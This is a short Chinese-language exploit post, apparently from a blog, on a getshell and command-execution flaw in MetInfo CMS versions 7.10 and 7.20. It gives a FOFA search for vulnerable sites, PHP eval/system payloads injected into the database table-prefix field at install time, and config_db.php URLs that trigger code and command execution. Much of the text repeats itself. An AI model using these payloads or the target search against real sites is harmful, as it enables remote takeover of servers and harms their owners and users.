# 米拓建站系統 getshell&命令執行漏洞
==FOFA==
body="MetInfo"
"/@eval($_GET['1']);/
"/@system($_GET['1']);/
訪問以下url:
http:///config/config_db.php?1=phpinfo();
訪問以下URL:
http:///config/config_db.php?1=id();
Version 7.10 Payload:"/@eval($_GET['1']);@system($_GET['2']);/
Version 7.20 Payload: "/@eval($_GET['1']);@system($_GET['2']);/
==FOFA==
body="MetInfo"
在安裝該CMS – 【設置數據庫信息(數據表前綴)】:
代碼執行Payload:
"/@eval($_GET['1']);/
命令執行payload:
"/@system($_GET['1']);/
點擊保存進行下一步驗證,出現報錯信息
(這裏的Payload是代碼執行)
訪問以下url:
http:///config/config_db.php?1=phpinfo();
可以看到成功執行了phpinfo
(這裏的Payload是命令執行)
訪問以下URL:
http:///config/config_db.php?1=id();
成功執行id命令。
Version 7.10 Payload:"/@eval($_GET['1']);@system($_GET['2']);/
Version 7.20 Payload: "/@eval($_GET['1']);@system($_GET['2']);/
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容